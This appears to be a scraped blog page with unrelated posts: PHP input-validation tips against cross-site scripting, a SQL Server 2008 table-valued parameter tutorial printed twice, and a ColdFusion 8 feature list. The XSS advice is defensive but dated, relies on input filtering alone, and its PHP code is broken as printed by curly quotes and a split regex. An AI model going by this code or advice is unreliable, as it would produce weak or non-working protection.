Always, all the time, and constantly (pick your term), check to ensure what’s coming from POST and GET requests. However obvious, you should never pass by these steps.
If a specific and particular type of data is expected, check to ensure that it’s a really valid type and that its of the expected length. Whatever programming language you’re using will give you the possibility and the power to do that easily.
Whenever possible, use client-side validation for adding extra functionality to user input checking. Please note that JavaScript validation cannot be used on its own for checking data validity, but it may help to discourage some evil-minded visitors from entering malicious data while providing useful assistance to other well-intended users.
Remove conflicting characters from user input. Search for < and > characters and make sure they're quickly removed. Single and double quotes must be escaped properly too. Many professional websites fail when dealing with character escaping. I hope you won’t.
We might go on endlessly, with numerous tips about validating user data, but you can get a lot more from just checking some other useful tutorials and articles. For the sake of this article, we’ll show an example to prevent Cross Site Scripting using PHP.
A Quick Look at Cross Site Scripting - Coding for our safety
Let’s define a simple function to prevent the querysting from being tampered with external code. The function “validateQueryString()” is the following:
<?php
function validateQueryString ( $queryString , $min=1,
$max=32 ) {
if ( !preg_match ( "/^([a-zA-Z0-9]{".$min.",".$max."}=[a-zA-Z0-9]{".$min.",".$max."}&?)
+$/", $queryString ) ) {
return false;
}
return true;
}
?>
Once we have defined this function, we call it this way:
<?php
$queryString = $_SERVER[‘QUERY_STRING’];
if ( !validateQueryString ( $queryString ) ) {
header( ‘Location:errorpage.php’ );
}
else {
echo ‘Welcome to our site!’;
}
?>
Let’s break down the code to see it in detail.
The function performs pattern matching to the querystring passed as a parameter, checking to see if it matches the standard format of a querystring, including GET variable names that only contain the numbers 0-9 and valid letters either in lowercase or uppercase. Any other characters will be considered as invalid. Also, we have specified as a default value that variables can be from 1 to 32 characters long. If matches are not found, the function returns false. Otherwise, it will return true.
Next, we have performed validation on the querystring by calling the function. If it returns false -- that is, the querystring contains invalid characters -- the user will be taken to an error page, or whatever you like to do. If the function returns true, we just display a welcome message.
Of course, most of the time, we really know what variables to expect, so our validation function can be significantly simplified.
Given the previous URL,
http://www.yourdomain.com/welcomedir/
welcomepage.php?name=John
where the “name” variable is expected, we might write the new “validateAlphanum()” function:
<?php
function validateAlphanum( $value , $min = 1 , $max =
32 ) {
if ( !preg_match( "/^[a-zA-Z0-9]{".$min.",".$max."}
$/", $value ) ) {
return false;
}
return true;
}
?>
and finally validate the value like this:
<?php
$name = $_GET[‘name’];
if ( !validateAlphanum ( $name ) ) {
header( ‘Location:errorpage.php’ );
}
else {
echo ‘Welcome to our site!’;
}
?>
The concept is the same as explained above. The only noticeable difference is that we’re taking in the “name” variable as the parameter for the “validateAlphanum()” function and checking if it contains only the allowed characters 0-9, a-z and A-Z. Anything else will be considered an invalid input.
If you’re a strong advocate of object oriented programming, as I am, we might easily include this function as a new method for an object that performs user data validation. Something similar to this:
<?php
$name = $_GET[‘name’];
// get variable value
$dv = &new dataValidator();
// instantiate new data
validator object
if ( !$dv->validateAlphanum( $name ) ) {
// execute validation method
header( ‘Location:errorpage.php’ );
}
else {
echo ‘Welcome to our site!’;
}
?>
Pretty simple, isn’t it?
In order to avoid Cross Site Scripting, several approaches can be taken, whether procedural or object-oriented programming is your personal taste.
In both cases, we’ve developed specific functions to validate querystrings and avoid tampered or unexpected user input data, demonstrating that Cross Site Scripting can be prevented easily with some help coming from our favorite server-side language.
Conclusion
As usually, dealing with user input data is a very sensitive issue, and Cross Site Scripting falls under this category. It is a serious problem that can be avoided with some simple validation techniques, as we have seen through this article.
Building up robust applications that won’t make poor assumptions about visitor’s input is definitely the correct way to prevent Cross Site Scripting attacks and other harmful techniques. Client environments must always be considered as a pretty unsafe and unknown territory. So, for the sake of your website’s sanity and yours, keep your eyes open.
Sunday, February 15, 2009
Passing a Table to a Stored Procedure
Introduction
SQL Server 2005 and previous versions do not support passing a table variable to a stored procedure
The CODE
This article is based on SQL Server 2008 CTP 3. Some of the information may change by the time the product is finally released.
Before we create a Function or Stored Procedure that accepts a TABLE variable, we need to define a User Defined TABLE Type. SQL Server 2008 introduced a new User defined TABLE type. A TABLE type represents the structure of a table that can be passed to a stored procedure or function.
So the first step is to create a User Defined TABLE type. The following TSQL code creates a User defined TABLE type named "ItemInfo".
1 CREATE TYPE ItemInfo AS TABLE
2 (
3 ItemNumber VARCHAR(50),
4 Qty INT
5 )
You can use the system view SYS.TYPES to see the type that you have just created. The following query returns all the types defined in the system.
1 SELECT * FROM SYS.TYPES
2
3 /*
4 If you just need to find information about the TABLE types, you could find it from
5 the following TSQL query.
6 */
7
8 SELECT * FROM SYS.TYPES WHERE is_table_type = 1
9
10 /*
11 There is another view, which is handy to find information about TABLE types.
12 */
13
14 SELECT * FROM SYS.TABLE_TYPES
We have created a TABLE type that we need. Now let us see how it works. Let us create a variable of type "ItemInfo" and try to insert a few records to it. Then lets query the table variable to see if the information is correctly inserted. [code]
1 /*
2 Let us declare a variable of type ItemInfo which is a TABLE Type
3 */
4 DECLARE @items AS ItemInfo
5
6 /*
7 Insert values to the variable
8 */
9
10 INSERT INTO @Items (ItemNumber, Qty)
11 SELECT '11000', 100 UNION ALL
12 SELECT '22000', 200 UNION ALL
13 SELECT '33000', 300
14
15 /*
16 Lets check if the values are correctly inserted or not
17 */
18 SELECT * FROM @Items
19
20 /*
21 OUTPUT:
22
23 ItemNumber Qty
24 -------------------------------------------------- -----------
25 11000 100
26 22000 200
27 33000 300
28 */
Now let us create a stored procedure that accepts a TABLE variable. Let us create a very simple stored procedure which accepts a TABLE variable and SELECTs contents of the table.
1 CREATE PROCEDURE TableParamDemo
2 (
3 @Items ItemInfo
4 )
5
6 AS
7
8 SELECT *
9 FROM @Items
Well, this would generate the following error:
1 /*
2 Msg 352, Level 15, State 1, Procedure TableParamDemo, Line 1
3 The table-valued parameter "@Items" must be declared with the READONLY option.
4 */
A table variable that is passed to a stored procedure or function should be marked as READONLY. The "callee" cannot modify the table being passed into it. Here is the correct code.
1 CREATE PROCEDURE TableParamDemo
2 (
3 @Items ItemInfo READONLY
4 )
5
6 AS
7
8 SELECT *
9 FROM @Items
Now let us execute the stored procedure we just created. Run the following code.
1 /*
2 declare the variable
3 */
4 DECLARE @items AS ItemInfo
5
6 /*
7 Insert values to the variable
8 */
9
10 INSERT INTO @Items (ItemNumber, Qty)
11 SELECT '11000', 100 UNION ALL
12 SELECT '22000', 200 UNION ALL
13 SELECT '33000', 300
14
15 /*
16 Execute the procedure
17 */
18 EXECUTE TableParamDemo @Items
19
20 /*
21 OUTPUT:
22
23 ItemNumber Qty
24 -------------------------------------------------- -----------
25 11000 100
26 22000 200
27 33000 300
28
29 */
You cannot modify the TABLE parameter passed into the stored procedure. If you try to do so, you will get an error as shown in the following example.
1 CREATE PROCEDURE TableParamDemo
2 (
3 @Items ItemInfo READONLY
4 )
5
6 AS
7
8 SELECT *
9 FROM @Items
10
11 INSERT INTO @Items (ItemNumber, Qty)
12 SELECT '1001', 20
13
14 /*
15 OUTPUT:
16
17 Msg 10700, Level 16, State 1, Procedure TableParamDemo, Line 11
18 The table-valued parameter "@Items" is READONLY and cannot be modified.
19 */
Conclusions
The support for TABLE variables is very interesting. While working with User Defined TABLE Type, please note that you cannot use it as a column of a table. Please also note that, once created, you cannot alter the structure of the TABLE.
SQL Server 2005 and previous versions do not support passing a table variable to a stored procedure
The CODE
This article is based on SQL Server 2008 CTP 3. Some of the information may change by the time the product is finally released.
Before we create a Function or Stored Procedure that accepts a TABLE variable, we need to define a User Defined TABLE Type. SQL Server 2008 introduced a new User defined TABLE type. A TABLE type represents the structure of a table that can be passed to a stored procedure or function.
So the first step is to create a User Defined TABLE type. The following TSQL code creates a User defined TABLE type named "ItemInfo".
1 CREATE TYPE ItemInfo AS TABLE
2 (
3 ItemNumber VARCHAR(50),
4 Qty INT
5 )
You can use the system view SYS.TYPES to see the type that you have just created. The following query returns all the types defined in the system.
1 SELECT * FROM SYS.TYPES
2
3 /*
4 If you just need to find information about the TABLE types, you could find it from
5 the following TSQL query.
6 */
7
8 SELECT * FROM SYS.TYPES WHERE is_table_type = 1
9
10 /*
11 There is another view, which is handy to find information about TABLE types.
12 */
13
14 SELECT * FROM SYS.TABLE_TYPES
We have created a TABLE type that we need. Now let us see how it works. Let us create a variable of type "ItemInfo" and try to insert a few records to it. Then lets query the table variable to see if the information is correctly inserted. [code]
1 /*
2 Let us declare a variable of type ItemInfo which is a TABLE Type
3 */
4 DECLARE @items AS ItemInfo
5
6 /*
7 Insert values to the variable
8 */
9
10 INSERT INTO @Items (ItemNumber, Qty)
11 SELECT '11000', 100 UNION ALL
12 SELECT '22000', 200 UNION ALL
13 SELECT '33000', 300
14
15 /*
16 Lets check if the values are correctly inserted or not
17 */
18 SELECT * FROM @Items
19
20 /*
21 OUTPUT:
22
23 ItemNumber Qty
24 -------------------------------------------------- -----------
25 11000 100
26 22000 200
27 33000 300
28 */
Now let us create a stored procedure that accepts a TABLE variable. Let us create a very simple stored procedure which accepts a TABLE variable and SELECTs contents of the table.
1 CREATE PROCEDURE TableParamDemo
2 (
3 @Items ItemInfo
4 )
5
6 AS
7
8 SELECT *
9 FROM @Items
Well, this would generate the following error:
1 /*
2 Msg 352, Level 15, State 1, Procedure TableParamDemo, Line 1
3 The table-valued parameter "@Items" must be declared with the READONLY option.
4 */
A table variable that is passed to a stored procedure or function should be marked as READONLY. The "callee" cannot modify the table being passed into it. Here is the correct code.
1 CREATE PROCEDURE TableParamDemo
2 (
3 @Items ItemInfo READONLY
4 )
5
6 AS
7
8 SELECT *
9 FROM @Items
Now let us execute the stored procedure we just created. Run the following code.
1 /*
2 declare the variable
3 */
4 DECLARE @items AS ItemInfo
5
6 /*
7 Insert values to the variable
8 */
9
10 INSERT INTO @Items (ItemNumber, Qty)
11 SELECT '11000', 100 UNION ALL
12 SELECT '22000', 200 UNION ALL
13 SELECT '33000', 300
14
15 /*
16 Execute the procedure
17 */
18 EXECUTE TableParamDemo @Items
19
20 /*
21 OUTPUT:
22
23 ItemNumber Qty
24 -------------------------------------------------- -----------
25 11000 100
26 22000 200
27 33000 300
28
29 */
You cannot modify the TABLE parameter passed into the stored procedure. If you try to do so, you will get an error as shown in the following example.
1 CREATE PROCEDURE TableParamDemo
2 (
3 @Items ItemInfo READONLY
4 )
5
6 AS
7
8 SELECT *
9 FROM @Items
10
11 INSERT INTO @Items (ItemNumber, Qty)
12 SELECT '1001', 20
13
14 /*
15 OUTPUT:
16
17 Msg 10700, Level 16, State 1, Procedure TableParamDemo, Line 11
18 The table-valued parameter "@Items" is READONLY and cannot be modified.
19 */
Conclusions
The support for TABLE variables is very interesting. While working with User Defined TABLE Type, please note that you cannot use it as a column of a table. Please also note that, once created, you cannot alter the structure of the TABLE.
coldfusion 8 pdf download
>>Download coldfusion 8 pdf
coldfusion 8 new features
Adobe Flex integration
ColdFusion 8 now includes Adobe LiveCycle® Data Services ES (formerly Flex™ Data Services) and other data exchange improvements to simplify the data-enabling of rich Internet applications (RIAs) you build with ColdFusion and Flex.
Image manipulation
ColdFusion 8 adds more than 50 new tags and functions for creating and manipulating images, from simple to sophisticated. For example, the new CFIMAGE tag provides shortcuts to the most common image actions, including reading, writing, resizing, rotating, and converting images.
Atom and RSS feeds
ColdFusion 8 introduces the new CFFEED tag, which can read and create RSS and Atom feeds in commonly used formats, so you can quickly and easily create complex content syndication applications.
Improved file manipulation functions
ColdFusion 8 adds several new file manipulation functions to the ColdFusion Markup Language (CFML), most notably the ability to read and write large files in defined segments, rather than in a single operation.
JavaScript operators in CFML
ColdFusion 8 supports common JavaScript operators such as ++, ==, ||, <, and > so they can be used in CFML expressions.
CFC improvements
ColdFusion 8 adds several highly requested improvements to ColdFusion components (CFCs), including the ability to create interface definitions, use J2EE session replication in a cluster, have access to the CFCs in session data across all the machines in a cluster, and use the new onMissing Method function
Reporting enhancements
ColdFusion 8 introduces a completely new version of the ColdFusion Report Builder. Use it to create high-quality, structured reports with more output choices and a more consistent look and feel throughout your applications. You can also create and apply cascading style sheet (CSS) definitions to reports, export your reports in HTML or XML format, and create report styles for all of your reports.
Database interaction improvements
ColdFusion 8 provides a new DBINFO tag to programmatically access information about a data source, allows stored procedures and queries using CFQUERYPARAM to be cached, and much more. Plus, there is expanded database driver support with new options for SQL Server 2005, Oracle 10g, Sybase ASE15, MySQL 4 and 5, PostgreSQL 8, and others.
Array and structure creation improvements
ColdFusion 8 allows you to create arrays and structures implicitly in assignment statements without using the ArrayNew or Structnew functions. The result is cleaner code with less typing
Download coldfusion 8 pdf
Wednesday, February 11, 2009
sitemap
Site Map
Homepage
Page generated by XML-Sitemaps.com - A Google sitemaps and html sitemaps generator
|
Copyright © 2006, 2007
Subscribe to:
Posts (Atom)